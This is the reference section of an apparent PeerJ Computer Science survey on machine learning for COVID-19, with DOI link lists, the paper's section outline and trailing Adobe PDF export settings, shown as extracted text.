http://dx.doi.org/10.1016/j.imu.2020.100297 http://dx.doi.org/10.1056/NEJMoa2001191 http://dx.doi.org/10.12688/f1000research.23690.1 http://dx.doi.org/10.1109/ACCESS.2020.3005510 http://dx.doi.org/10.1016/S0140-6736(20)30183-5 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Huang L, Han R, Ai T, Yu P, Kang H, Tao Q, Xia L. 2020b. Serial quantitative chest ct assessment of covid-19: deep-learning approach. Radiology: Cardiothoracic Imaging 2(2):e200075 DOI 10.1148/ryct.2020200075. Hui DS, Azhar EI, Madani TA, Ntoumi F, Kock R, Dar O, Ippolito G, Mchugh TD, Memish ZA, Drosten C, Zumla A, Petersen E. 2020. The continuing 2019-nCoV epidemic threat of novel coronaviruses to global health: the latest 2019 novel coronavirus outbreak in Wuhan, China. International Journal of Infectious Diseases 91:264–266 DOI 10.1016/j.ijid.2020.01.009. Hurt B, Kligerman S, Hsiao A. 2020. Deep learning localization of pneumonia: 2019 coronavirus (COVID-19) outbreak. Journal of Thoracic Imaging 35(3):W87–W89 DOI 10.1097/RTI.0000000000000512. Imai N, Dorigatti I, Cori A, Donnelly C, Riley S, Ferguson N. 2020. Report 2: estimating the potential total number of novel Coronavirus cases in Wuhan City, China. Imperial College London Epub ahead of print 22 January 2020 DOI 10.25561/77150. Inui S, Fujikawa A, Jitsu M, Kunishima N, Watanabe S, Suzuki Y, Umeda S, Uwabe Y. 2020. Chest CT findings in cases from the cruise ship “Diamond Princess” with coronavirus disease 2019 (COVID-19). Radiology: Cardiothoracic Imaging 2(2):e200110 DOI 10.1148/ryct.2020200110. Jaiswal A, Gianchandani N, Singh D, Kumar V, Kaur M. 2020. Classification of the COVID-19 infected patients using DenseNet201 based deep transfer learning. Journal of Biomolecular Structure and Dynamics Epub ahead of print 3 July 2020 DOI 10.1080/07391102.2020.1788642. Jiang X, Coffee M, Bari A, Wang J, Jiang X, Shi J, Dai J, Cai J, Zhang T, Wu Z, He G, Huang Y. 2020. Towards an artificial intelligence framework for data-driven prediction of coronavirus clinical severity. Computers, Materials & Continua 63(1):537–551 DOI 10.32604/cmc.2020.010691. Karim F, Majumdar S, Darabi H, Chen S. 2018. LSTM fully convolutional networks for time series classification. IEEE Access 6:1662–1669 DOI 10.1109/ACCESS.2017.2779939. Ke YY, Peng TT, Yeh TK, Huang WZ, Chang SE, Wu SH, Hung HC, Hsu TA, Lee SJ, Song JS, Lin WH, Chiang TJ, Lin JH, Sytwu HK, Chen CT. 2020. Artificial intelligence approach fighting COVID-19 with repurposing drugs. Biomedical Journal 43(4):355–362 DOI 10.1016/j.bj.2020.05.001. Klein SL, Jedlicka A, Pekosz A. 2010. The Xs and Y of immune responses to viral vaccines. Lancet Infectious Diseases 10(5):338–349 DOI 10.1016/S1473-3099(10)70049-9. Kooraki S, Hosseiny M, Myers L, Gholamrezanezhad A. 2020. Coronavirus (COVID-19) outbreak: what the department of radiology should know. Journal of the American College of Radiology 17(4):447–451 DOI 10.1016/j.jacr.2020.02.008. Kumar A, Gupta PK, Srivastava A. 2020. A review of modern technologies for tackling COVID-19 pandemic. Diabetes & Metabolic Syndrome: Clinical Research & Reviews 14(4):569–573 DOI 10.1016/j.dsx.2020.05.008. Lecun Y, Bengio Y, Hinton G. 2015. Deep learning. Nature 521(7553):436–444 DOI 10.1038/nature14539. Li D, Wang D, Dong J, Wang N, Huang H, Xu H, Xia C. 2020a. False-negative results of real-time reverse-transcriptase polymerase chain reaction for severe acute respiratory syndrome coronavirus 2: role of deep-learning-based CT diagnosis and insights from two cases. Korean Journal of Radiology 21(4):505–508 DOI 10.3348/kjr.2020.0146. Li L, Qin L, Xu Z, Yin Y, Wang X, Kong B, Bai J, Lu Y, Fang Z, Song Q, Cao K, Liu D, Wang G, Xu Q, Fang X, Zhang S, Xia J, Xia J. 2020b. Artificial intelligence distinguishes COVID-19 from community acquired pneumonia on chest CT. Radiology 296(2):200905. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 41/45 http://dx.doi.org/10.1148/ryct.2020200075 http://dx.doi.org/10.1016/j.ijid.2020.01.009 http://dx.doi.org/10.1097/RTI.0000000000000512 http://dx.doi.org/10.25561/77150 http://dx.doi.org/10.1148/ryct.2020200110 http://dx.doi.org/10.1080/07391102.2020.1788642 http://dx.doi.org/10.32604/cmc.2020.010691 http://dx.doi.org/10.1109/ACCESS.2017.2779939 http://dx.doi.org/10.1016/j.bj.2020.05.001 http://dx.doi.org/10.1016/S1473-3099(10)70049-9 http://dx.doi.org/10.1016/j.jacr.2020.02.008 http://dx.doi.org/10.1016/j.dsx.2020.05.008 http://dx.doi.org/10.1038/nature14539 http://dx.doi.org/10.3348/kjr.2020.0146 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Li Z, Zhong Z, Li Y, Zhang T, Gao L, Jin D, Sun Y, Ye X, Yu L, Hu Z, Xiao J, Huang L, Tang Y. 2020c. From community acquired pneumonia to COVID-19: a deep learning based method for quantitative analysis of COVID-19 on thick-section CT Scans. European Radiology 30(12):6828–6837 DOI 10.1007/s00330-020-07042-x. Liu F, Zhang Q, Huang C, Shi C, Wang L, Shi N, Fang C, Shan F, Mei X, Shi J, Song F, Yang Z, Ding Z, Su X, Lu H, Zhu T, Zhang Z, Shi L, Shi J. 2020a. CT quantification of pneumonia lesions in early days predicts progression to severe illness in a cohort of COVID-19 patients. Theranostics 10(12):5613–5622 DOI 10.7150/thno.45985. Liu G, Xu YAN, He Z, Rao Y, Xia J, Fan L. 2019. Deep learning-based channel prediction for edge computing networks toward intelligent connected vehicles. IEEE Access 7:114487–114495 DOI 10.1109/ACCESS.2019.2935463. Liu Z, Huang S, Lu W, Su Z, Yin X, Liang H, Zhang H. 2020b. Modeling the trend of coronavirus disease 2019 and restoration of operational capability of metropolitan medical service in China: a machine learning and mathematical model-based analysis. Global Health Research and Policy 5(1):1–11 DOI 10.1186/s41256-019-0129-8. Livingstone DJ. 2008. Artificial neural networks: methods and applications. Totowa: Humana Press. Loey M, Smarandache F, Khalifa NEM. 2020. Within the lack of chest COVID-19 X-ray dataset: a novel detection model based on GAN and deep transfer learning. Symmetry 12(4):651 DOI 10.3390/sym12040651. Lou J, Tian SJ, Niu SM, Kang XQ, Lian HX, Zhang LX, Zhang JJ. 2020. Coronavirus disease 2019: a bibliometric analysis and review. European Review for Medical and Pharmacological Sciences 24(6):3411–3421. Mei X, Lee HC, Diao KY, Huang M, Lin B, Liu C, Xie Z, Ma Y, Robson PM, Chung M, Bernheim A, Mani V, Calcagno C, Li K, Li S, Shan H, Lv J, Zhao T, Xia J, Long Q, Steinberger S, Jacobi A, Deyer T, Luksza M, Liu F, Little BP, Fayad ZA, Yang Y. 2020. Artificial intelligence-enabled rapid diagnosis of patients with COVID-19. Nature Medicine 26:1–5. Mohammadi M, Al-Fuqaha A, Sorour S, Guizani M. 2018. Deep learning for IoT big data and streaming analytics: a survey. IEEE Communications Surveys & Tutorials 20(4):2923–2960 DOI 10.1109/COMST.2018.2844341. Oh Y, Park S, Ye JC. 2020. Deep learning covid-19 features on cxr using limited training data sets. IEEE Transactions on Medical Imaging 39(8):2688–2700 DOI 10.1109/TMI.2020.2993291. Ozturk T, Talo M, Yildirim EA, Baloglu UB, Yildirim O, Acharya UR. 2020. Automated detection of COVID-19 cases using deep neural networks with X-ray images. Computers in Biology and Medicine 121:103792 DOI 10.1016/j.compbiomed.2020.103792. Pan F, Ye T, Sun P, Gui S, Liang B, Li L, Zheng D, Wang J, Hesketh RL, Yang L, Zheng C. 2020. Time course of lung changes on chest CT during recovery from 2019 novel coronavirus (COVID-19) pneumonia. Radiology 295:200370. Park Y, Casey D, Joshi I, Zhu J, Cheng F. 2020. Emergence of new disease-how can artificial intelligence help? Trends in Molecular Medicine 26(7):627–629 DOI 10.1016/j.molmed.2020.04.007. Patel A, Jernigan DB, 2019-nCoV CDC Response Team. 2020. Initial public health response and interim clinical guidance for the 2019 novel coronavirus outbreak—United States, December 31, 2019–February 4, 2020. Morbidity and Mortality Weekly Report 69(5):140–146 DOI 10.15585/mmwr.mm6905e1. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 42/45 http://dx.doi.org/10.1007/s00330-020-07042-x http://dx.doi.org/10.7150/thno.45985 http://dx.doi.org/10.1109/ACCESS.2019.2935463 http://dx.doi.org/10.1186/s41256-019-0129-8 http://dx.doi.org/10.3390/sym12040651 http://dx.doi.org/10.1109/COMST.2018.2844341 http://dx.doi.org/10.1109/TMI.2020.2993291 http://dx.doi.org/10.1016/j.compbiomed.2020.103792 http://dx.doi.org/10.1016/j.molmed.2020.04.007 http://dx.doi.org/10.15585/mmwr.mm6905e1 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Peng QY, Wang XT, Zhang LN, Chinese Critical Care Ultrasound Study Group. 2020. Findings of lung ultrasonography of novel corona virus pneumonia during the 2019–2020 epidemic. Intensive Care Medicine 46(5):849–850 DOI 10.1007/s00134-020-05996-6. Pirouz B, Shaffiee Haghshenas S, Shaffiee Haghshenas S, Piro P. 2020. Investigating a serious challenge in the sustainable development process: analysis of confirmed cases of COVID-19 (new type of coronavirus) through a binary classification using artificial intelligence and regression analysis. Sustainability 12(6):2427. Pouyanfar S, Sadiq S, Yan Y, Tian H, Tao Y, Reyes MP, Shyu M, Chen S, Iyengar SS. 2018. A survey on deep learning: algorithms, techniques, and applications. ACM Computing Surveys 51(5):1–36 DOI 10.1145/3150226. Qiang XL, Xu P, Fang G, Liu WB, Kou Z. 2020. Using the spike protein feature to predict infection risk and monitor the evolutionary dynamic of coronavirus. Infectious Diseases of Poverty 9(1):1–8 DOI 10.1186/s40249-020-00649-8. Rahaman MM, Li C, Yao Y, Kulwa F, Rahman MA, Wang Q, Qi S, Kong F, Zhu X, Zhao X. 2020. Identification of COVID-19 samples from chest X-Ray images using deep learning: a comparison of transfer learning approaches. Journal of X-Ray Science and Technology 28(5):1–19. Randhawa GS, Soltysiak MP, El Roz H, De Souza CP, Hill KA, Kari L. 2020. Machine learning using intrinsic genomic signatures for rapid classification of novel pathogens: COVID-19 case study. PLOS ONE 15(4):e0232391 DOI 10.1371/journal.pone.0232391. Rao ASS, Vazquez JA. 2020. Identification of COVID-19 can be quicker through artificial intelligence framework using a mobile phone–based survey when cities and towns are under quarantine. Infection Control & Hospital Epidemiology Epub ahead of print 3 March 2020 DOI 10.1017/ice.2020.61. Read JM, Bridgen JR, Cummings DA, Ho A, Jewell CP. 2020. Novel coronavirus 2019-nCoV: early estimation of epidemiological parameters and epidemic predictions. MedRxiv DOI 10.1101/2020.01.23.20018549. Ribeiro MHDM, Da Silva RG, Mariani VC, Dos Santos Coelho L. 2020. Short-term forecasting COVID-19 cumulative confirmed cases: perspectives for Brazil. Chaos, Solitons & Fractals 135:109853 DOI 10.1016/j.chaos.2020.109853. Rodrigues JCL, Hare SS, Devaraj A, Jacob J, Johnstone A, McStay R, Nair A, Robinson G. 2020. An update on COVID-19 for the radiologist-A British society of Thoracic Imaging statement. Clinical Radiology 75(5):323–325. Rodriguez-Morales AJ, Cardona-Ospina JA, Gutiérrez-Ocampo E, Villamizar-Peña R, Holguin-Rivera Y, Escalera-Antezana JP, Alvarado-Arnez LE, Bonilla-Aldana DK, Franco-Paredes C, Henao-Martinez AF, Paniz-Mondolfi A, Lagos-Grisales GJ, Ramírez-Vallejo E, Suárez JA, Zambrano LI, Villamil-Gómez WE, Balbin-Ramon GJ, Rabaan AA, Harapan H, Dhama K, Nishiura H, Kataoka H, Ahmad T, Latin American Network of Coronavirus Disease 2019-COVID-19 Research (LANCOVID-19). 2020. Clinical, laboratory and imaging features of COVID-19: a systematic review and meta-analysis. Travel Medicine and Infectious Disease 34:101623 DOI 10.1016/j.tmaid.2020.101623. Sak H, Senior A, Beaufays F. 2014. Long short-term memory recurrent neural network architectures for large scale acoustic modeling has. In: Fifteenth Annual Conference of the International Speech Communication Association. Salman FM, Abu-Naser SS, Alajrami E, Abu-Nasser BS, Alashqar BA. 2020. Covid-19 detection using artificial intelligence. International Journal of Academic Engineering Research (IJAER) 4(3):18–25. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 43/45 http://dx.doi.org/10.1007/s00134-020-05996-6 http://dx.doi.org/10.1145/3150226 http://dx.doi.org/10.1186/s40249-020-00649-8 http://dx.doi.org/10.1371/journal.pone.0232391 http://dx.doi.org/10.1017/ice.2020.61 http://dx.doi.org/10.1101/2020.01.23.20018549 http://dx.doi.org/10.1016/j.chaos.2020.109853 http://dx.doi.org/10.1016/j.tmaid.2020.101623 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Santosh KC. 2020. AI-driven tools for coronavirus outbreak: need of active learning and cross-population train/test models on multitudinal/multimodal data. Journal of Medical Systems 44(5):1–5 DOI 10.1007/s10916-019-1451-x. Shi F, Wang J, Shi J, Wu Z, Wang Q, Tang Z, He K, Shi Y, Shen D. 2020. Review of artificial intelligence techniques in imaging data acquisition, segmentation and diagnosis for covid-19. IEEE reviews in Biomedical Engineering Epub ahead of print 16 April 2020 DOI 10.1109/rbme.2020.2987975. Singh D, Kumar V, Kaur M. 2020. Classification of COVID-19 patients from chest CT images using multi-objective differential evolution-based convolutional neural networks. European Journal of Clinical Microbiology & Infectious Diseases Epub ahead of print 27 April 2020 DOI 101007/s10096-020-03901-z. Singh D, Kumar V, Yadav V, Kaur M. 2020. Deep convolutional neural networks based classification model for COVID-19 infected patients using chest X-ray images. International Journal of Pattern Recognition and Artificial Intelligence 4:2151004 DOI 10.1142/S0218001421510046. Stewart KA, Navarro SM, Kambala S, Tan G, Poondla R, Lederman S, Barbour K, Lavy C. 2020. Trends in ultrasound use in low and middle income countries: a systematic review. International Journal of Maternal and Child Health and AIDS 9(1):103. Tiwari S, Kumar S, Guleria K. 2020. Outbreak trends of coronavirus disease–2019 in India: a prediction. Disaster Medicine and Public Health Preparedness Epub ahead of print 22 April 2020 DOI 10.1017/dmp.2020.115. Toğaçar M, Ergen B, Cömert Z. 2020. COVID-19 detection using deep learning models to exploit social mimic optimization and structured chest X-ray images using fuzzy color and stacking approaches. Computers in Biology and Medicine 121:103805 DOI 10.1016/j.compbiomed.2020.103805. Tuli S, Tuli S, Tuli R, Gill SS. 2020. Predicting the growth and trend of COVID-19 pandemic using machine learning and cloud computing. Internet of Things 11:100222 DOI 10.1016/j.iot.2020.100222. Tummers J, Catal C, Tobi H, Tekinerdogan B, Leusink G. 2020. Coronaviruses and people with intellectual disability: an exploratory data analysis. Journal of Intellectual Disability Research 64(7):475–481 DOI 10.1111/jir.12730. Ucar F, Korkmaz D. 2020. COVIDiagnosis-Net: deep Bayes-SqueezeNet based diagnostic of the coronavirus disease 2019 (COVID-19) from x-ray images. Medical Hypotheses 140:109761 DOI 10.1016/j.mehy.2020.109761. Vaid S, Cakan C, Bhandari M. 2020. Using machine learning to estimate unobserved COVID-19 infections in North America. Journal of Bone and Joint Surgery Epub ahead of print 7 May 2020 DOI 102106/JBJS.20.0071. Vaishya R, Javaid M, Khan IH, Haleem A. 2020. Artificial intelligence (AI) applications for COVID-19 pandemic. Diabetes & Metabolic Syndrome: Clinical Research & Reviews 14(4):337–339 DOI 10.1016/j.dsx.2020.04.012. Wang W, Xu Y, Gao R, Lu R, Han K, Wu G, Tan W. 2020a. Detection of SARS-CoV-2 in different types of clinical specimens. JAMA 323(18):1843–1844 DOI 10.1001/jama.2020.3786. Wang Y, Dong C, Hu Y, Li C, Ren Q, Zhang X, Shi H, Zhou M. 2020b. Temporal changes of CT findings in 90 patients with COVID-19 pneumonia: a longitudinal study. Radiology 296:200843 DOI 10.1148/radiol.2020200843. Weidt F, Silva R. 2016. Systematic literature review in computer science-a practical guide. Relatórios Técnicos Do DCC/UFJF 1 DOI 10.13140/RG.2.2.35453.87524. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 44/45 http://dx.doi.org/10.1007/s10916-019-1451-x http://dx.doi.org/10.1109/rbme.2020.2987975 http://dx.doi.org/10.1007/s10096-020-03901-z http://dx.doi.org/10.1142/S0218001421510046 http://dx.doi.org/10.1017/dmp.2020.115 http://dx.doi.org/10.1016/j.compbiomed.2020.103805 http://dx.doi.org/10.1016/j.iot.2020.100222 http://dx.doi.org/10.1111/jir.12730 http://dx.doi.org/10.1016/j.mehy.2020.109761 http://dx.doi.org/10.2106/JBJS.20.0071 http://dx.doi.org/10.1016/j.dsx.2020.04.012 http://dx.doi.org/10.1001/jama.2020.3786 http://dx.doi.org/10.1148/radiol.2020200843 http://dx.doi.org/10.13140/RG.2.2.35453.87524 http://dx.doi.org/10.7717/peerj-cs.313 https://peerj.com/computer-science/ Wen Z, Chi Y, Zhang L, Liu H, Du K, Li Z, Chen J, Cheng L, Wang D. 2020. Coronavirus disease 2019: initial detection on chest CT in a retrospective multicenter study of 103 Chinese subjects. Radiology: Cardiothoracic Imaging 2(2):e200092 DOI 10.1148/ryct.2020200092. Wong HYF, Lam HYS, Fong AHT, Leung ST, Chin TWY, Lo CSY, Lui MM-S, Lee JCY, Chiu KW-H, Chung TW-H, Lee EYP, Wan EYF, Hung IFN, Lam TPW, Kuo MD, Ng M-Y. 2020. Frequency and distribution of chest radiographic findings in COVID-19 positive patients. Radiology 201160(2):E72–E78 DOI 10.1148/radiol.2020201160. World Health Organization. 2020. Novel Coronavirus (2019-nCoV): Situation Report, 3. Geneva: WHO. Available at https://reliefweb.int/report/china/novel-coronavirus-2019-ncov-situation- report-3-23-january-2020. Wu X, Hui H, Niu M, Li L, Wang L, He B, Yang X, Li L, Li H, Tian J, Zha Y. 2020. Deep learning-based multi-view fusion model for screening 2019 novel coronavirus pneumonia: a multicentre study. European Journal of Radiology 128:109041 DOI 10.1016/j.ejrad.2020.109041. Wynants L, Van Calster B, Collins GS, Riley RD, Heinze G, Schuit E, Bonten MMJ, Debray TPA, De Vos M, Dhiman P, Haller MC, Henckaerts L, Kreuzberger N, Luijken Lohman A, Ma K, Andaur J, Reitsma CL, Sergeant JB, Skoetz JC, Snel C, Smits N, Snell KIE, Sperrin M, Steyerberg EW, Takada T, Van Kuijk SMJ, Van Royen FS, Wallisch C, Hooft L, Moons KGM, Van Smeden M. 2020. Prediction models for diagnosis and prognosis of covid-19 infection: systematic review and critical appraisal. BMJ 369:m1328 DOI 10.1136/bmj.m1328. Xie X, Zhong Z, Zhao W, Zheng C, Wang F, Liu J. 2020. Chest CT for typical 2019-nCoV pneumonia: relationship to negative RT-PCR testing. Radiology 200343(2):E41–E45 DOI 10.1148/radiol.2020200343. Xu X, Yu C, Qu J, Zhang L, Jiang S, Huang D, Chen B, Zhang Z, Guan W, Ling Z, Jiang R, Hu T, Ding Y, Lin L, Gan Q, Luo L, Tang X, Liu J. 2020. Imaging and clinical features of patients with 2019 novel coronavirus SARS-CoV-2. European Journal of Nuclear Medicine and Molecular Imaging 1-6(5):1275–1280 DOI 10.1007/s00259-020-04735-9. Yang S, Jiang L, Cao Z, Wang L, Cao J, Feng R, Zhang Z, Xue X, Shi Y, Shan F. 2020a. Deep learning for detecting corona virus disease 2019 (COVID-19) on high-resolution computed tomography: a pilot study. Annals of Translational Medicine 8(7):450 DOI 10.21037/atm.2020.03.132. Yang Z, Zeng Z, Wang K, Wong SS, Liang W, Zanin M, Liu P, Cao X, Gao Z, Mai Z, Liang J, Liu X, Li S, Li Y, Ye F, Guan W, Yang Y, Li F, Luo S, Xie Y, Liu B, Wang Z, Zhang S, Wang Y, Zhong N, He J. 2020b. Modified SEIR and AI prediction of the epidemics trend of COVID-19 in China under public health interventions. Journal of Thoracic Disease 12(3):165–174 DOI 10.21037/jtd.2020.02.64. Yuen KS, Ye ZW, Fung SY, Chan CP, Jin DY. 2020. SARS-CoV-2 and COVID-19: the most important research questions. Cell & Bioscience 10(1):1–5 DOI 10.1186/s13578-019-0370-3. Zhao R, Yan R, Chen Z, Mao K, Wang P, Gao RX. 2019. Deep learning and its applications to machine health monitoring. Mechanical Systems and Signal Processing 115:213–237 DOI 10.1016/j.ymssp.2018.05.050. Zhao Z, Chen W, Wu X, Chen PCY, Liu J. 2017. LSTM network : a deep learning approach for short-term traffic forecast. IET Intelligent Transport Systems 11(2):68–75. Zu ZY, Jiang MD, Xu PP, Chen W, Ni QQ, Lu GM, Zhang LJ. 2020. Coronavirus disease 2019 (COVID-19): a perspective from China. Radiology 200490(2):E15–E25 DOI 10.1148/radiol.2020200490. Chiroma et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.313 45/45 http://dx.doi.org/10.1148/ryct.2020200092 http://dx.doi.org/10.1148/radiol.2020201160 https://reliefweb.int/report/china/novel-coronavirus-2019-ncov-situation-report-3-23-january-2020 https://reliefweb.int/report/china/novel-coronavirus-2019-ncov-situation-report-3-23-january-2020 http://dx.doi.org/10.1016/j.ejrad.2020.109041 http://dx.doi.org/10.1136/bmj.m1328 http://dx.doi.org/10.1148/radiol.2020200343 http://dx.doi.org/10.1007/s00259-020-04735-9 http://dx.doi.org/10.21037/atm.2020.03.132 http://dx.doi.org/10.21037/jtd.2020.02.64 http://dx.doi.org/10.1186/s13578-019-0370-3 http://dx.doi.org/10.1016/j.ymssp.2018.05.050 http://dx.doi.org/10.1148/radiol.2020200490 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.313 Early survey with bibliometric analysis on machine learning approaches in controlling COVID-19 outbreaks Introduction Methodology Theoretical background of machine learning algorithms Covid-19 machine learning adoption-oriented perspective Covid-19 datasets Survey and bibliometric analysis Challenges and future research opportunities Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA 